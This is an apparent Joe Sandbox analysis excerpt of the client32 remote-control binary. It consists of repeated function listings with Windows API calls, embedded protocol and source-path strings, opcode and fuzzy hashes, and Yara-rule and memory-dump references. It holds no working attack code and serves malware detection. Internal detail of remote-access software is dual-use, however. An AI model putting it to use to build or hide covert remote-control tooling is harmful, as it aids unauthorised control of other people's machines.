                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEventwsprintf
                                                                                                                                        • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                        • API String ID: 3430577181-2624497655
                                                                                                                                        • Opcode ID: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                        • Instruction ID: 536c81e74eca5bf7a4e2791cfcdf9f566333e3a1added10bfa629768b284d793
                                                                                                                                        • Opcode Fuzzy Hash: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                        • Instruction Fuzzy Hash: 21317A75E00296EFD725CF90C884F9EF7F9AB45314F00819AD54A9B241DB70E9C1CB61
                                                                                                                                        Function 688FBAC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FBB46
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
                                                                                                                                        • API String ID: 3180605519-2489130399
                                                                                                                                        • Opcode ID: b876621d46b5c548b37038788c0dea2f89ccdfe5cba8ec62ff423474cca3997a
                                                                                                                                        • Instruction ID: 3805b5eb88ff155816c088b9ea8f6cb8ab9e2a214a3d17f8b9168b3d7ee65f6d
                                                                                                                                        • Opcode Fuzzy Hash: b876621d46b5c548b37038788c0dea2f89ccdfe5cba8ec62ff423474cca3997a
                                                                                                                                        • Instruction Fuzzy Hash: D12138BA900219BBDB11DBA8CD40FFF777CAF94254F908919B905A7144EB31EA04C7B5
                                                                                                                                        Function 688FBB90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FBC16
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
                                                                                                                                        • API String ID: 3180605519-89615960
                                                                                                                                        • Opcode ID: e866ae189034018e012b88f83dad6ea51ea3445507f9bbc17f75cebc308209b6
                                                                                                                                        • Instruction ID: 0792d5c1e87dac996d2673e889b61731a0492f6ca8a9c621aa7da3e7e125a20d
                                                                                                                                        • Opcode Fuzzy Hash: e866ae189034018e012b88f83dad6ea51ea3445507f9bbc17f75cebc308209b6
                                                                                                                                        • Instruction Fuzzy Hash: 6C2124BA900219BADB11DAA8CD40FFF777C9B98254F908919A905A7144EA31EA44C7B2
                                                                                                                                        Function 688F2A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                        • _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                        • _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                        • wsprintfA.USER32 ref: 688F2B05
                                                                                                                                          • Part of subcall function 688F2CE0: GetModuleHandleA.KERNEL32(NSMTRACE,688F2AB1), ref: 688F2CFA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                                                        • String ID: HTCTL32
                                                                                                                                        • API String ID: 2529650285-1670862073
                                                                                                                                        • Opcode ID: 51f632195a8ff683293888b2003b1a2332409504805a2aa791fdc2262f5dbc4f
                                                                                                                                        • Instruction ID: f41ae93f6dc7b2417e750f2de2046536182aad671636aa656f1c2c61fdb7c66f
                                                                                                                                        • Opcode Fuzzy Hash: 51f632195a8ff683293888b2003b1a2332409504805a2aa791fdc2262f5dbc4f
                                                                                                                                        • Instruction Fuzzy Hash: 752135349083989BDB22DB788D45BEA3BB4DB1B348FC008E8DD8A5F181D7748946C791
                                                                                                                                        Function 688F7DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F7E0E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7EB7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7ED0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 3751686142-4141403093
                                                                                                                                        • Opcode ID: 02b07f75caee9767b80a4c0d11cb74921a0d10535b1e6bda20a64b321819c940
                                                                                                                                        • Instruction ID: 5ace48902db25204025466b976886941d73cadaebd527fdcf19d88d7a4f4c54e
                                                                                                                                        • Opcode Fuzzy Hash: 02b07f75caee9767b80a4c0d11cb74921a0d10535b1e6bda20a64b321819c940
                                                                                                                                        • Instruction Fuzzy Hash: BF217EB1C04208AFEF20DFA4C8057AEBBF5FF09304F4044AAD559E6280EB359A44CFA1
                                                                                                                                        Function 688FBE00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset_strncpy
                                                                                                                                        • String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
                                                                                                                                        • API String ID: 3140232205-2748231828
                                                                                                                                        • Opcode ID: 1d29ad1a6b9c88dda8d2a4ea31f57cf4e8e776fe64493609e5df09d1e80a97c1
                                                                                                                                        • Instruction ID: 2a211fb18fa806c17ac7e550b8f1ba377efe5f4be8e47cc024d983ccc1302d92
                                                                                                                                        • Opcode Fuzzy Hash: 1d29ad1a6b9c88dda8d2a4ea31f57cf4e8e776fe64493609e5df09d1e80a97c1
                                                                                                                                        • Instruction Fuzzy Hash: F7113636B443217BEB104958AC02BEF3398CB52798F810436FE18E67D1E331E896CB95
                                                                                                                                        Function 68910670 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893CF98,?,00000000,27CEFB69), ref: 689106AD
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893CF98,?,00000000,27CEFB69), ref: 689106F9
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,27CEFB69), ref: 68910700
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$DeleteEnterLeave
                                                                                                                                        • String ID: Refcount.cpp$p < ep
                                                                                                                                        • API String ID: 655268472-358336193
                                                                                                                                        • Opcode ID: 78d3c1b74c031eccaa98ede8373dc603a9813ccd250b3c3dc5ea1c7501a9f077
                                                                                                                                        • Instruction ID: f77947de7d6a2a0b922ab152b45ee0ef5357fa4781a6c3e7580d3a54a60f9663
                                                                                                                                        • Opcode Fuzzy Hash: 78d3c1b74c031eccaa98ede8373dc603a9813ccd250b3c3dc5ea1c7501a9f077
                                                                                                                                        • Instruction Fuzzy Hash: E321D57694C628EFCB20DF58CD40F6EB7A8FB86754F80061AF896A3240D771D800CBA1
                                                                                                                                        Function 6890FDE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890FE0A
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6890FE19
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890FE8C
                                                                                                                                          • Part of subcall function 6890F540: InitializeCriticalSection.KERNEL32(6893CF98,27CEFB69,?,?,?,?,?,6892EFC8,000000FF), ref: 6890F574
                                                                                                                                          • Part of subcall function 6890F540: EnterCriticalSection.KERNEL32(6893CF98,27CEFB69,?,?,?,?,?,6892EFC8,000000FF), ref: 6890F590
                                                                                                                                          • Part of subcall function 6890F540: LeaveCriticalSection.KERNEL32(6893CF98,?,?,?,?,?,6892EFC8,000000FF), ref: 6890F5D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                                                        • String ID: Refcount.cpp$p.second
                                                                                                                                        • API String ID: 2150084884-1554893322
                                                                                                                                        • Opcode ID: ad5546563f885f584d742f8df1fcdcddaf3334f2ca3699cea7ee588070ad86af
                                                                                                                                        • Instruction ID: cf5dd3a6f30d72aaecd300adf1d72b829c2dcdc8fe33ab4e4edd1cef353f49de
                                                                                                                                        • Opcode Fuzzy Hash: ad5546563f885f584d742f8df1fcdcddaf3334f2ca3699cea7ee588070ad86af
                                                                                                                                        • Instruction Fuzzy Hash: FF216276904608AFCB21DF94D841FEFB7B8FF19318F50461EE516A3680D770A605CB95
                                                                                                                                        Function 6890B960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup
                                                                                                                                        • String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                        • API String ID: 838363481-1357550281
                                                                                                                                        • Opcode ID: 23d029142cee983248ae457151ce8ef0a09c94870d5e30484585e425a6cc80cf
                                                                                                                                        • Instruction ID: 744562d3c235ea29647c6d3fe69bc9bb6321f2871c3ad1445b93273320cab6dc
                                                                                                                                        • Opcode Fuzzy Hash: 23d029142cee983248ae457151ce8ef0a09c94870d5e30484585e425a6cc80cf
                                                                                                                                        • Instruction Fuzzy Hash: 3B112575600625AFC710DB9CEC16D2AB3A99FD924DB808029E5AD97300E771EC1147C2
                                                                                                                                        Function 6890FFC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57threadwindowsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890FFD8
                                                                                                                                          • Part of subcall function 6890DAC0: SetEvent.KERNEL32(00000000), ref: 6890DAE4
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 6891000C
                                                                                                                                          • Part of subcall function 6890FBC0: EnterCriticalSection.KERNEL32(?,?,76933550,6891001D), ref: 6890FBC8
                                                                                                                                          • Part of subcall function 6890FBC0: LeaveCriticalSection.KERNEL32(?), ref: 6890FBD5
                                                                                                                                        • PostMessageA.USER32(?,00000501,00000000,00000000), ref: 68910034
                                                                                                                                        • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 6891003B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                                                                                                        • String ID: Queue
                                                                                                                                        • API String ID: 620033763-3191623783
                                                                                                                                        • Opcode ID: dce199f1283492021509c2c725a4eac080a649dd751f3ab2aadbc276064ddbaa
                                                                                                                                        • Instruction ID: 3b7385d820e5bfb24ff613d16058f02ad625125bcedf5b143de5f9b7a616d214
                                                                                                                                        • Opcode Fuzzy Hash: dce199f1283492021509c2c725a4eac080a649dd751f3ab2aadbc276064ddbaa
                                                                                                                                        • Instruction Fuzzy Hash: AD11E53564CB14DFDB31DBA8C850B2F33A8AB5675CF804029E85A97380CB71EC10CB95
                                                                                                                                        Function 68909250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(6893CF70), ref: 6890928A
                                                                                                                                          • Part of subcall function 688F2420: _strrchr.LIBCMT ref: 688F242E
                                                                                                                                        • wsprintfA.USER32 ref: 689092B6
                                                                                                                                        • CreateEventA.KERNEL32(?,?,?,?), ref: 689092D6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEventIncrementInterlocked_strrchrwsprintf
                                                                                                                                        • String ID: %s_L%d_%x$0/#v
                                                                                                                                        • API String ID: 3335914318-2739044988
                                                                                                                                        • Opcode ID: ec4fb9eaf3b02cd0b39ef1e9822af4c5d20018f0202a0ea5923b3f5d7a0f9afe
                                                                                                                                        • Instruction ID: f5658143393fe34678cc037163d50c670bb579f5a36527510f8e02d4033628b7
                                                                                                                                        • Opcode Fuzzy Hash: ec4fb9eaf3b02cd0b39ef1e9822af4c5d20018f0202a0ea5923b3f5d7a0f9afe
                                                                                                                                        • Instruction Fuzzy Hash: 30115E75A04218AFCB20DF58CC45DEAB7BCEF89314F404199E95593200D770EA44CFA0
                                                                                                                                        Function 11141100 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadStringA.USER32(00000000,?,00000058,A0A8B03E), ref: 11141118
                                                                                                                                        • wsprintfA.USER32 ref: 1114112E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadStringwsprintf
                                                                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                        • API String ID: 104907563-3240211118
                                                                                                                                        • Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                        • Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
                                                                                                                                        • Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                        • Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5
                                                                                                                                        Function 11067180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ACF
                                                                                                                                          • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ADD
                                                                                                                                        • GetParent.USER32(00000000), ref: 1106719C
                                                                                                                                        • GetParent.USER32(00000000), ref: 110671A5
                                                                                                                                        • IsChild.USER32(00000000,00000000), ref: 110671B9
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                          • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                          • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
